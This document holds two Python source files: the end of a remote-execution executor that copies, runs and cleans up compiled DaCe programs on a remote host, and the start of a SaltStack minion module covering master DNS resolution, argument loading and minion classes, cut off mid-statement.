self.copy_file_to_remote(tmpfolder + "/" + so_name,
remote_dace_dir)
dace_file = dace_state.get_dace_tmpfile()
if dace_file is None:
raise ValueError("Dace file is None!")
# copy the SDFG
try:
local_sdfg = tmpfolder + "/sdfg.out"
sdfg = dace_state.get_sdfg()
sdfg.save(local_sdfg)
remote_sdfg = remote_workdir + "/sdfg.out"
self.copy_file_to_remote(local_sdfg, remote_sdfg)
except:
print("Could NOT save the SDFG")
remote_dace_file = remote_workdir + "/" + os.path.basename(
dace_file)
self.copy_file_to_remote(dace_file, remote_dace_file)
if self.running_async:
# Add information about what is being run
self.async_host.notify("All files copied to remote")
papi = PAPIUtils.is_papi_used(sdfg)
# We got the file there, now we can run with different
# configurations.
if papi:
multirun_num = PAPISettings.perf_multirun_num(
config=self._config)
for iteration in range(multirun_num):
optdict, omp_thread_num = PAPIUtils.get_run_options(
self, iteration)
self.remote_exec_dace(
remote_workdir,
remote_dace_file,
use_mpi,
fail_on_nonzero,
omp_num_threads=omp_thread_num,
repetitions=dace_state.repetitions,
additional_options_dict=optdict)
if self.running_async:
# Add information about what is being run
self.async_host.notify("Done option threads=" +
str(omp_thread_num))
else:
self.remote_exec_dace(
remote_workdir,
remote_dace_file,
use_mpi,
fail_on_nonzero,
repetitions=dace_state.repetitions)
self.show_output("Execution Terminated\n")
try:
self.copy_file_from_remote(remote_workdir + "/results.log",
".")
except:
pass
if papi:
# Copy back the vectorization results
PAPIUtils.retrieve_vectorization_report(
self, code_objects, remote_dace_dir)
# Copy back the instrumentation results
PAPIUtils.retrieve_instrumentation_results(
self, remote_workdir)
if self.running_async:
# Add information about what is being run
self.async_host.notify("Cleaning up")
try:
self.remote_delete_file(remote_workdir + "/results.log")
except:
print(
"WARNING: results.log could not be transmitted (probably not created)"
)
self.remote_delete_file(remote_dace_file)
self.remote_delete_dir(remote_dace_dir)
def deferred():
try:
res = self.update_performance_plot("results.log",
str(self.counter))
os.remove("results.log")
except FileNotFoundError:
print("WARNING: results.log could not be read")
if not self.headless or self.perfplot is None:
if self.running_async and not self.headless:
self.async_host.run_sync(deferred)
else:
deferred()
if self.running_async:
# Add information about what is being run
self.async_host.notify("Done cleaning")
# Update the performance data.
if self.rendered_graphs is not None:
self.rendered_graphs.set_memspeed_target()
self.rendered_graphs.render_performance_data(
self.config_get("instrumentation", "papi_mode"))
except Exception as e:
print("\n\n\n")
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
print("Running the program failed:")
traceback.print_exc()
print(
"Inspect above output for more information about executed command sequence."
)
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
if self.headless:
sys.exit(1)
if self.running_async:
self.async_host.notify("All done")
self.counter += 1
def update_performance_plot(self, resfile, name):
# Each result.log will give us many runs of one size and optimization.
# We ignore everything in the result log except the timing
# If no perfplot is set, write it to the output as text with a prefix
if self.perfplot is None:
import re
with open(resfile) as f:
data = f.read()
p = re.compile('\s(\d+\.\d+)$', re.MULTILINE)
times = p.findall(data)
self.show_output("\n~#~#" + str(times))
else:
times = self.perfplot.parse_result_log(resfile)
self.perfplot.add_run(name, times)
self.perfplot.render()
t = sorted([float(s) for s in times])
print(t)
return t[int(len(t) / 2)]
def show_output(self, outstr):
""" Displays output of any ongoing compilation or computation. """
if self.output_generator is not None:
# Pipe the output
self.output_generator(outstr)
return
if isinstance(outstr, str):
print(outstr, end="", flush=True)
return
sys.stdout.buffer.write(outstr)
def remote_delete_file(self, delfile):
s = Template(self.config_get("execution", "general", "execcmd"))
cmd = s.substitute(
host=self.config_get("execution", "general", "host"),
command="rm " + delfile)
self.exec_cmd_and_show_output(cmd)
def remote_delete_dir(self, deldir):
s = Template(self.config_get("execution", "general", "execcmd"))
cmd = s.substitute(
host=self.config_get("execution", "general", "host"),
command="rm -r " + deldir)
self.exec_cmd_and_show_output(cmd)
def delete_local_folder(self, path):
os.removedirs(path)
def remote_exec_dace(self,
remote_workdir,
dace_file,
use_mpi=True,
fail_on_nonzero=False,
omp_num_threads=None,
additional_options_dict=None,
repetitions=None):
additional_options_dict = additional_options_dict or {}
run = "${command} "
if use_mpi == True:
run = self.config_get("execution", "mpi", "mpiexec")
nprocs = self.config_get("execution", "mpi", "num_procs")
else:
nprocs = 1
repetitions = (repetitions or self.config_get("execution", "general",
"repetitions"))
omp_num_threads_str = ""
omp_num_threads_unset_str = ""
perf_instrumentation_result_marker = ""
if omp_num_threads is not None:
omp_num_threads_str = "export OMP_NUM_THREADS=" + str(
omp_num_threads) + "\n"
omp_num_threads_unset_str = "unset OMP_NUM_THREADS\n"
perf_instrumentation_result_marker = "echo '# ;%s; Running in multirun config' >> %s/instrumentation_results.txt\n" % (
omp_num_threads_str.replace("\n", ""), remote_workdir)
# Create string from all misc options
miscoptstring = ""
miscoptresetstring = ""
for optkey, optval in additional_options_dict.items():
miscoptstring += "export " + str(optkey) + "=" + str(optval) + "\n"
miscoptresetstring += "unset " + str(optkey) + "\n"
# Create a startscript which exports necessary env-vars
start_sh = "set -x\n" + \
"export DACE_compiler_use_cache=1\n" + \
"export DACE_optimizer_interface=''\n" + \
"export DACE_profiling=1\n" + \
"export DACE_treps=" + str(repetitions) +"\n" + \
miscoptstring + \
omp_num_threads_str + \
"cd " + remote_workdir + "\n" + \
perf_instrumentation_result_marker
s = Template(run + " ")
cmd = s.substitute(command="python3 " + dace_file, num_procs=nprocs)
start_sh += cmd + "\n"
start_sh += "export RETVAL=$?\n"
start_sh += (
"unset DACE_compiler_use_cache\n" +
"unset DACE_optimizer_interface\n" + "unset DACE_treps\n" +
"unset DACE_profiling\n" + omp_num_threads_unset_str +
miscoptresetstring +
# TODO: separate program error and system error
"exit $RETVAL\n")
tempdir = tempfile.mkdtemp()
startsh_file = os.path.join(tempdir, "start.sh")
fh = open(startsh_file, "w")
fh.write(start_sh)
fh.close()
st = os.stat(startsh_file)
os.chmod(startsh_file, st.st_mode | stat.S_IEXEC)
workdir = self.config_get("execution", "general", "workdir")
self.copy_file_to_remote(
startsh_file,
self.config_get("execution", "general", "workdir") + "/start.sh")
s = Template(self.config_get("execution", "general", "execcmd"))
cmd = s.substitute(
host=self.config_get("execution", "general", "host"),
command=workdir + "/start.sh")
self.exec_cmd_and_show_output(cmd, fail_on_nonzero)
self.remote_delete_file(workdir + "/start.sh")
def remote_compile(self, rem_path, dace_progname):
compile_cmd = "python3 -m dace.codegen.compiler " + str(
rem_path) + " " + dace_progname
s = Template(self.config_get("execution", "general", "execcmd"))
cmd = s.substitute(
host=self.config_get("execution", "general", "host"),
command=compile_cmd)
self.exec_cmd_and_show_output(cmd)
def create_remote_directory(self, path):
""" Creates a path on a remote node.
@note: We use `mkdir -p` for now, which is not portable.
"""
mkdircmd = "mkdir -p " + path
s = Template(self.config_get("execution", "general", "execcmd"))
cmd = s.substitute(
host=self.config_get("execution", "general", "host"),
command=mkdircmd)
self.exec_cmd_and_show_output(cmd)
def copy_file_to_remote(self, src, dst):
s = Template(self.config_get("execution", "general", "copycmd_l2r"))
cmd = s.substitute(
host=self.config_get("execution", "general", "host"),
srcfile=src,
dstfile=dst)
self.exec_cmd_and_show_output(cmd)
def copy_folder_to_remote(self, src, dst):
for root, subdirs, files in os.walk(src):
for filename in files:
file_path = os.path.join(root, filename)
self.copy_file_to_remote(file_path, dst + "/" + filename)
for subdir in subdirs:
self.create_remote_directory(dst + "/" + str(subdir))
self.copy_folder_to_remote(src + "/" + str(subdir),
dst + "/" + str(subdir))
return
def copy_file_from_remote(self, src, dst):
s = Template(self.config_get("execution", "general", "copycmd_r2l"))
cmd = s.substitute(
host=self.config_get("execution", "general", "host"),
srcfile=src,
dstfile=dst)
self.exec_cmd_and_show_output(cmd)
def exec_cmd_and_show_output(self, cmd, fail_on_nonzero=True):
self.show_output(cmd + "\n")
p = subprocess.Popen(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
while True:
out = p.stdout.read(1)
if out == '' or out == b'':
break
if out != '' and out != b'':
self.show_output(out)
stdout, _ = p.communicate(timeout=60)
self.show_output(stdout)
if p.returncode != 0 and fail_on_nonzero:
print("The command " + cmd + " failed (retcode " +\
str(p.returncode) + ")!\n")
if self.headless and self.exit_on_error:
os._exit(p.returncode)
else:
raise ValueError("The command " + cmd + " failed (retcode " + \
str(p.returncode) + ")!")
import threading, queue
class AsyncExecutor:
""" Asynchronous remote execution. """
def __init__(self, perfplot, headless, sdfg_renderer, diode):
self.executor = Executor(perfplot, headless, sdfg_renderer, self)
self.executor.setExitOnError(False)
self.to_thread_message_queue = queue.Queue(128)
self.from_thread_message_queue = queue.Queue(128)
self.diode = diode
self.running_thread = None
self.autoquit = True # This determines if a "quit"-message stops the thread
self.sync_run_lock = threading.Lock()
def counter_issue(self):
self.diode.onCounterIssue()
def run_sync(self, func):
# Synchronize using a lock
def deferred():
with self.sync_run_lock:
func()
return False
from gi.repository import GObject
GObject.idle_add(deferred)
def notify(self, message):
if self.diode is None:
return
import time
print("Got message " + str(message))
def deferred():
status_text = self.diode.builder.get_object("run_status_text")
status_progress_bar = self.diode.builder.get_object("run_status")
status_text.set_text(message)
return False
from gi.repository import GObject
GObject.idle_add(deferred)
if (message == "All done"):
self.to_thread_message_queue.put("quit")
time.sleep(0.001) # Equivalent of `sched_yield()` for Python
def run_async(self, dace_state, fail_on_nonzero=False):
if self.running_thread is not None and self.running_thread.is_alive():
print("Cannot start another thread!")
return
def task():
self.run()
self.running_thread = threading.Thread(target=task)
self.running_thread.start()
self.append_run_async(dace_state, fail_on_nonzero=False)
def append_run_async(self, dace_state, fail_on_nonzero=False):
self.to_thread_message_queue.put(("run", dace_state, fail_on_nonzero))
def add_async_task(self, task):
self.to_thread_message_queue.put(("execute_task", self, task))
def execute_task(self, task):
return task()
def callMethod(self, obj, name, *args):
# Shortcut for executing a simple task
if name == "execute_task":
_, subargs = args
return self.execute_task(subargs)
return getattr(obj, name)(*args)
def run(self):
while True:
# Read a message (blocking)
msg = self.to_thread_message_queue.get()
if msg == "quit":
if self.to_thread_message_queue.empty() and self.autoquit:
print("Quitting async execution")
break
else:
# There still is some queued work.
continue
if msg == "forcequit":
break
# Unwrap and call
ret = self.callMethod(self.executor, *msg)
# Put the return value (including the complete command)
self.from_thread_message_queue.put(("retval", ret, *msg))
def join(self, timeout=None):
pass
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import time
import errno
import types
import signal
import fnmatch
import hashlib
import logging
import threading
import traceback
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.exceptions import (
AuthenticationError, CommandExecutionError, CommandNotFoundError,
SaltInvocationError, SaltReqTimeoutError, SaltClientError,
SaltSystemExit, SaltSyndicMasterError
)
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
err = 'Master address: {0} could not be resolved. Invalid or unresolveable address.'.format(
opts.get('master', 'Unknown'))
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in string_kwarg.iteritems():
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs:
raise SaltInvocationError(
'The following keyword arguments are not valid: {0}'
.format(', '.join(invalid_kwargs))
)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
class SMinion(object):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
self.opts = opts
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if isinstance(self.opts['master'], list):
masters = self.opts['master']
if self.opts['random_master'] is True:
shuffle(masters)
for master in masters:
self.opts['master'] = master
self.opts.update(resolve_dns(opts))
try:
self.gen_modules()
break
except SaltClientError:
log.warning(('Attempted to authenticate with master '
'{0} and failed'.format(master)))
continue
else:
if self.opts['random_master'] is True:
log.warning('random_master is True but there is only one master specified. Ignoring.')
self.opts.update(resolve_dns(opts))
self.gen_modules(initial_load=True)
else:
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment']
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.returners = salt.loader.returners(self.opts, self.functions)
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
def _init_context_and_poller(self):
self.context = zmq.Context()
self.poller = zmq.Poller()
def _prepare_minion_event_system(self):
# Prepare the minion event system
#
# Start with the publish socket
self._init_context_and_poller()
hash_type = getattr(hashlib, self.opts.get('hash_type', 'md5'))
# Only use the first 10 chars to keep longer hashes from exceeding the
# max socket path length.
id_hash = hash_type(self.opts['id']).hexdigest()[:10]
epub_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pub.ipc'.format(id_hash)
)
if os.path.exists(epub_sock_path):
os.unlink(epub_sock_path)
epull_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pull.ipc'.format(id_hash)
)
if os.path.exists(epull_sock_path):
os.unlink(epull_sock_path)
self.epub_sock = self.context.socket(zmq.PUB)
if self.opts.get('ipc_mode', '') == 'tcp':
epub_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pub_port']
)
epull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pull_port']
)
else:
epub_uri = 'ipc://{0}'.format(epub_sock_path)
salt.utils.zeromq.check_ipc_path_max_len(epub_uri)
epull_uri = 'ipc://{0}'.format(epull_sock_path)
salt.utils.zeromq.check_ipc_path_max_len(epull_uri)
log.debug(
'{0} PUB socket URI: {1}'.format(
self.__class__.__name__, epub_uri
)
)
log.debug(
'{0} PULL socket URI: {1}'.format(
self.__class__.__name__, epull_uri
)
)
# Check to make sure the sock_dir is available, create if not
default_minion_sock_dir = os.path.join(
salt.syspaths.SOCK_DIR,
'minion'
)
minion_sock_dir = self.opts.get('sock_dir', default_minion_sock_dir)
if not os.path.isdir(minion_sock_dir):
# Let's try to create the directory defined on the configuration
# file
try:
os.makedirs(minion_sock_dir, 0o755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's not fail yet and try using the default path
if minion_sock_dir == default_minion_sock_dir:
# We're already trying the default system path, stop now!
raise
if not os.path.isdir(default_minion_sock_dir):
try:
os.makedirs(default_minion_sock_dir, 0o755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's stop at this stage
raise
# Create the pull socket
self.epull_sock = self.context.socket(zmq.PULL)
# Securely bind the event sockets
if self.opts.get('ipc_mode', '') != 'tcp':
old_umask = os.umask(0o177)
try:
log.info('Starting pub socket on {0}'.format(epub_uri))
self.epub_sock.bind(epub_uri)
log.info('Starting pull socket on {0}'.format(epull_uri))
self.epull_sock.bind(epull_uri)
finally:
if self.opts.get('ipc_mode', '') != 'tcp':
os.umask(old_umask)
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons')
if b_conf:
return self.beacons.process(b_conf)
return []
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts, self.functions)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
def minions(self):
'''
Return a dict of minion generators bound to the tune_in method
dict of master -> minion_mapping, the mapping contains:
opts: options used to create the minion
last: last auth attempt time
auth_wait: time to wait for next auth attempt
minion: minion object
generator: generator function (non-blocking tune_in)
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
ret = {}
for master in set(self.opts['master']):
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
ret[master] = {'opts': s_opts,
'last': time.time(),
'auth_wait': s_opts['acceptance_wait_time']}
try:
minion = Minion(
s_opts,
self.MINION_CONNECT_TIMEOUT,
False,
'salt.loader.{0}'.format(master))
ret[master]['minion'] = minion
ret[master]['generator'] = minion.tune_in_no_block()
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(master))
return ret
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._prepare_minion_event_system()
self.poller.register(self.epull_sock, zmq.POLLIN)
# Prepare the minion generators
minions = self.minions()
loop_interval = int(self.opts['loop_interval'])
auth_wait = self.opts['acceptance_wait_time']
max_wait = self.opts['acceptance_wait_time_max']
while True:
package = None
for minion in six.itervalues(minions):
if isinstance(minion, dict):
if 'minion' in minion:
minion = minion['minion']
else:
continue
if not hasattr(minion, 'schedule'):
continue
loop_interval = self.process_schedule(minion, loop_interval)
socks = dict(self.poller.poll(1))
if socks.get(self.epull_sock) == zmq.POLLIN:
try:
package = self.epull_sock.recv(zmq.NOBLOCK)
except Exception:
pass
masters = list(minions.keys())
shuffle(masters)
# Do stuff per minion that we have
for master in masters:
minion = minions[master]
# if we haven't connected yet, lets attempt some more.
# make sure to keep separate auth_wait times, since these
# are separate masters
if 'generator' not in minion:
if time.time() - minion['auth_wait'] > minion['last']:
minion['last'] = time.time()
if minion['auth_wait'] < max_wait:
minion['auth_wait'] += auth_wait
try:
t_minion = Minion(minion['opts'], self.MINION_CONNECT_TIMEOUT, False)
minions[master]['minion'] = t_minion
minions[master]['generator'] = t_minion.tune_in_no_block()
minions[master]['auth_wait'] = self.opts['acceptance_wait_time']
except SaltClientError:
log.error('Error while bring up minion for multi-master. Is master {0} responding?'.format(master))
continue
else:
continue
# run scheduled jobs if you have them
loop_interval = self.process_schedule(minion['minion'], loop_interval)
# If a minion instance receives event, handle the event on all
# instances
if package:
try:
for master in masters:
minions[master].handle_event(package)
except Exception:
pass
finally:
package = None
# have the Minion class run anything it has to run
next(minion['generator'])
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module
opts['grains'] = salt.loader.grains(opts)
# evaluate the master to connect to and authenticate with it
opts['master'] = self.eval_master(opts,
timeout,
safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment']
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(opts, self.functions)
uid = salt.utils.get_uid(user=opts.get('user', None))
self.proc_dir = get_proc_dir(opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
})
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
})
self.grains_cache = self.opts['grains']
# store your hexid to subscribe to zmq, hash since zmq filters are prefix
# matches this way we can avoid collisions
self.hexid = hashlib.sha1(self.opts['id']).hexdigest()
if 'proxy' in self.opts['pillar']:
log.debug('I am {0} and I need to start some proxies for {1}'.format(self.opts['id'],
self.opts['pillar']['proxy']))
for p in self.opts['pillar']['proxy']:
log.debug('Starting {0} proxy.'.format(p))
pid = os.fork()
if pid > 0:
continue
else:
proxyminion = ProxyMinion(self.opts)
proxyminion.start(self.opts['pillar']['proxy'][p])
self.clean_die(signal.SIGTERM, None)
else:
log.debug('I am {0} and I am not supposed to start any proxies. '
'(Likely not a problem)'.format(self.opts['id']))
# __init__() from MinionBase is called in Minion.eval_master()
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns the current master address. In standard mode, just calls
authenticate() with the given master address.
With master_type=func evaluates the current master address from the given
module and then calls authenticate().
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to connect is used to authenticate() and
then returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# check if master_type was altered from its default
if opts['master_type'] != 'str':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
shuffle(opts['master'])
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
